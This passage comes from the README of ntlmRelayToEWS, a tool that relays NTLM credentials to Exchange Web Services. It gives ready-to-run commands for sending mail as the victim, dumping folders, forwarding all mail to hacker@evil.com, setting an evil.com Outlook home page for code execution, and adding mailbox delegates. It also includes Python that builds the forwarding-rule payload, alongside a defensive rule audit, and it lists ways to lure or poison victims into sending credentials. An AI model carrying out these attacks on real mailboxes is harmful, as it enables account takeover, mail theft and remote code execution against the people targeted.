Limitations and Improvements
Requests.session which is not the type of HTTP(S) session we have by default with the HTTPClientRelay: it would have required either to refactor the HTTPClientRelay to use 'Requests' (/me lazy) or to simply get zeep to create the messages with zeep.client.create_message() and then send them with the relayed session we already have. Or is it because I'm a lame developer? Oh well...
Prerequisites
ntlmRelayToEWS requires a proper, clean install of Impacket, so follow the Impacket project's own instructions to get a working version before running the tool.
Usage
ntlmRelayToEWS implements the following attacks, all of which are performed on behalf of the relayed user (the victim).
Refer to the built-in help for additional information: ./ntlmRelayToEWS.py -h
Get more debug information with the --verbose or -v flag.
sendMail
Sends an HTML-formatted e-mail, read from a file, to a comma-separated list of recipients:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d "user1@corporate.org,user2@corporate.com" -s Subject -m sampleMsg.html
getFolder
Retrieves all items from one of the predefined folders (inbox, sent items, calendar, tasks):
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inbox
forwardRule
Creates a malicious inbox rule that forwards every incoming message for the victim to another e-mail address:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d hacker@evil.com
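The forwardRule attack is, on the wire, an EWS UpdateInboxRules request that installs a rule with no conditions and a ForwardToRecipients action. The following is an added example, not ntlmRelayToEWS's own code: it builds that SOAP envelope with the standard library (the namespace URIs and element names are those of the EWS schema; the rule name "Forward all" and the Exchange2010_SP2 version header are assumptions), and it also gives the check a defender wants, an audit of a mailbox's rules, as returned by GetInboxRules, for forwarding or redirection to addresses outside the organisation's domains. The GetInboxRules response below is a constructed sample, not captured traffic.

```python
"""Added example (not the ntlmRelayToEWS project's code).

build_forward_rule_request() produces the EWS UpdateInboxRules SOAP body
that a relayed NTLM session could send on the victim's behalf.
external_forwards() is the defensive counterpart: it scans t:Rule elements
(e.g. from a GetInboxRules response) for forward/redirect actions that
leave the listed internal domains.
"""
import xml.etree.ElementTree as ET

# Real EWS namespace URIs (SOAP 1.1 envelope, EWS messages, EWS types).
SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
M = "http://schemas.microsoft.com/exchange/services/2006/messages"
T = "http://schemas.microsoft.com/exchange/services/2006/types"
ET.register_namespace("soap", SOAP)
ET.register_namespace("m", M)
ET.register_namespace("t", T)

# Actions that cause a copy of the mail to leave the mailbox.
FORWARDING_ACTIONS = (
    "ForwardToRecipients",
    "ForwardAsAttachmentToRecipients",
    "RedirectToRecipients",
)


def _sub(parent, ns, tag, text=None):
    """Append a namespaced child element, optionally with text content."""
    el = ET.SubElement(parent, f"{{{ns}}}{tag}")
    if text is not None:
        el.text = text
    return el


def build_forward_rule_request(forward_to, rule_name="Forward all",
                               version="Exchange2010_SP2"):
    """Return the UpdateInboxRules SOAP envelope (bytes) that installs a
    rule forwarding every incoming message to forward_to.  The empty
    t:Conditions element is what makes the rule match all mail.
    rule_name and version are assumed values, not ones the tool uses."""
    env = ET.Element(f"{{{SOAP}}}Envelope")
    header = _sub(env, SOAP, "Header")
    _sub(header, T, "RequestServerVersion").set("Version", version)
    body = _sub(env, SOAP, "Body")
    req = _sub(body, M, "UpdateInboxRules")
    # Discard any Outlook-side rule blob so the server-side rule wins.
    _sub(req, M, "RemoveOutlookRuleBlob", "true")
    ops = _sub(req, M, "Operations")
    rule = _sub(_sub(ops, T, "CreateRuleOperation"), T, "Rule")
    _sub(rule, T, "DisplayName", rule_name)
    _sub(rule, T, "Priority", "1")
    _sub(rule, T, "IsEnabled", "true")
    _sub(rule, T, "Conditions")  # no conditions: applies to every message
    actions = _sub(rule, T, "Actions")
    address = _sub(_sub(actions, T, "ForwardToRecipients"), T, "Address")
    _sub(address, T, "EmailAddress", forward_to)
    return ET.tostring(env, encoding="utf-8")


def external_forwards(rules_xml, internal_domains):
    """Scan any EWS XML containing t:Rule elements and return
    (rule display name, address) pairs whose forward/redirect target is
    not in internal_domains (a set of lower-case domain names)."""
    internal = {d.lower() for d in internal_domains}
    root = ET.fromstring(rules_xml)
    hits = []
    for rule in root.iter(f"{{{T}}}Rule"):
        name = rule.findtext(f"{{{T}}}DisplayName", default="")
        for action in FORWARDING_ACTIONS:
            for act_el in rule.iter(f"{{{T}}}{action}"):
                for em in act_el.iter(f"{{{T}}}EmailAddress"):
                    addr = (em.text or "").strip()
                    domain = addr.rsplit("@", 1)[-1].lower()
                    if domain not in internal:
                        hits.append((name, addr))
    return hits


# Constructed sample of a GetInboxRules response: one legitimate internal
# forward and one suspicious redirect with a near-invisible rule name.
SAMPLE_GET_INBOX_RULES = f"""<m:GetInboxRulesResponse xmlns:m="{M}" xmlns:t="{T}" ResponseClass="Success">
  <m:ResponseCode>NoError</m:ResponseCode>
  <m:OutlookRuleBlobExists>false</m:OutlookRuleBlobExists>
  <m:InboxRules>
    <t:Rule>
      <t:DisplayName>Copy to manager</t:DisplayName>
      <t:Priority>1</t:Priority>
      <t:IsEnabled>true</t:IsEnabled>
      <t:Conditions/>
      <t:Actions>
        <t:ForwardToRecipients><t:Address><t:EmailAddress>manager@corporate.org</t:EmailAddress></t:Address></t:ForwardToRecipients>
      </t:Actions>
    </t:Rule>
    <t:Rule>
      <t:DisplayName>.</t:DisplayName>
      <t:Priority>2</t:Priority>
      <t:IsEnabled>true</t:IsEnabled>
      <t:Conditions/>
      <t:Actions>
        <t:RedirectToRecipients><t:Address><t:EmailAddress>hacker@evil.com</t:EmailAddress></t:Address></t:RedirectToRecipients>
      </t:Actions>
    </t:Rule>
  </m:InboxRules>
</m:GetInboxRulesResponse>"""


if __name__ == "__main__":
    print(build_forward_rule_request("hacker@evil.com").decode())
    print(external_forwards(SAMPLE_GET_INBOX_RULES, {"corporate.org"}))
```

The audit deliberately looks at the parsed rule actions rather than the display name: an attacker-created rule often has an empty or single-character name, so name-based alerting misses it, while a ForwardToRecipients or RedirectToRecipients target outside the organisation is the reliable signal.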
setHomePage
Sets a folder home page (usually for the Inbox folder) pointing at a URL. This technique, uncovered by SensePost/Etienne Stalmans, allows arbitrary command execution in the victim's Outlook by serving a specially crafted HTML page: Outlook Home Page – Another Ruler Vector:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u http://path.to.evil.com/evilpage.html
addDelegate
Sets a delegate on the victim's primary mailbox. In other words, the victim delegates control of their mailbox to someone else. Once done, the delegate address has full control over the victim's mailbox and can simply open it as an additional mailbox in Outlook:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.org
How to get the victim to give you their credentials for relaying?
To get the victim to send their credentials to ntlmRelayToEWS, you can use any of the following well-known methods:
- Send the victim an e-mail containing a hidden picture whose 'src' attribute points to the ntlmRelayToEWS server, over either HTTP or SMB. See the Invoke-SendEmail.ps1 script to achieve this.
- Create a link (.lnk) file whose 'icon' attribute points to ntlmRelayToEWS through a UNC path, and let the victim browse a folder containing this link.
- Perform LLMNR, NBNS or WPAD poisoning (think of Responder.py or Invoke-Inveigh, for instance) to get the victim's SMB or HTTP traffic sent to ntlmRelayToEWS.
- Others?
Author
Arno0x0x - @Arno0x0x